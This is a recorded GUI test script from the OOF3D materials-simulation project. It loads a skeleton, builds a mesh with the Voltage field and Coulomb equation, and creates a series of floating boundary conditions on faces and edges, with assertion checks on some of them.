py
|
Python
|
TEST3D/GUI/0011213_page_bc/log.py
|
usnistgov/OOF3D
|
4fd423a48aea9c5dc207520f02de53ae184be74c
|
[
"X11"
] | 31
|
2015-04-01T15:59:36.000Z
|
2022-03-18T20:21:47.000Z
|
TEST3D/GUI/0011213_page_bc/log.py
|
usnistgov/OOF3D
|
4fd423a48aea9c5dc207520f02de53ae184be74c
|
[
"X11"
] | 3
|
2015-02-06T19:30:24.000Z
|
2017-05-25T14:14:31.000Z
|
TEST3D/GUI/0011213_page_bc/log.py
|
usnistgov/OOF3D
|
4fd423a48aea9c5dc207520f02de53ae184be74c
|
[
"X11"
] | 7
|
2015-01-23T15:19:22.000Z
|
2021-06-09T09:03:59.000Z
|
# -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
import tests
#Testing Boundary Condition creation using Floating on Voltage Field
#The equation here is Coulomb_Eqn
findWidget('OOF3D').resize(550, 350)
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Microstructure')
checkpoint page installed Microstructure
findWidget('OOF3D:Microstructure Page:Pane').set_position(225)
findWidget('OOF3D:Microstructure Page:Pane').set_position(156)
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
findMenu(findWidget('OOF3D:MenuBar'), 'File:Load:Data').activate()
checkpoint toplevel widget mapped Dialog-Data
findWidget('Dialog-Data').resize(190, 67)
findWidget('Dialog-Data:filename').set_text('TEST_DATA/two_walls.skeleton')
findWidget('Dialog-Data:gtk-ok').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint named analysis chooser set
checkpoint active area status updated
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint Field page sensitized
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Solver page sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint named analysis chooser set
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint Solver page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint pinnodes page sensitized
findWidget('OOF3D Activity Viewer').resize(400, 300)
checkpoint pinnodes page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint OOF.File.Load.Data
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'FE Mesh')
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint page installed FE Mesh
findWidget('OOF3D:FE Mesh Page:Pane').set_position(304)
findWidget('OOF3D:FE Mesh Page:New').clicked()
checkpoint toplevel widget mapped Dialog-Create a new mesh
findWidget('Dialog-Create a new mesh').resize(345, 153)
findWidget('Dialog-Create a new mesh:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(553, 200)
checkpoint named analysis chooser set
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Mesh.New
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Fields & Equations')
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint page installed Fields & Equations
findWidget('OOF3D').resize(667, 350)
findWidget('OOF3D:Fields & Equations Page:HPane').set_position(298)
findWidget('OOF3D:Fields & Equations Page:HPane:Fields:Voltage defined').clicked()
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Subproblem.Field.Define
findWidget('OOF3D:Fields & Equations Page:HPane:Fields:Voltage active').clicked()
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Subproblem.Field.Activate
findWidget('OOF3D:Fields & Equations Page:HPane:Equations:Coulomb_Eqn active').clicked()
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Subproblem.Equation.Activate
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Boundary Conditions')
checkpoint page installed Boundary Conditions
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Chooser'), 'Floating')
findWidget('Dialog-New Boundary Condition:name:Auto').clicked()
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(983, 200)
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
assert tests.boundaryConditionCheck(['floating_constantXmax'])
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continiumXmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(1023, 200)
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
assert tests.boundaryConditionCheck(['floating_constantXmax','floating_continiumXmax'])
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Xmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Ymax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Ymin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Zmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Zmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxYmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxYmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XmaxZmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmaxZmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmaxZmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminYmin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'XminZmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXminZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXminZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
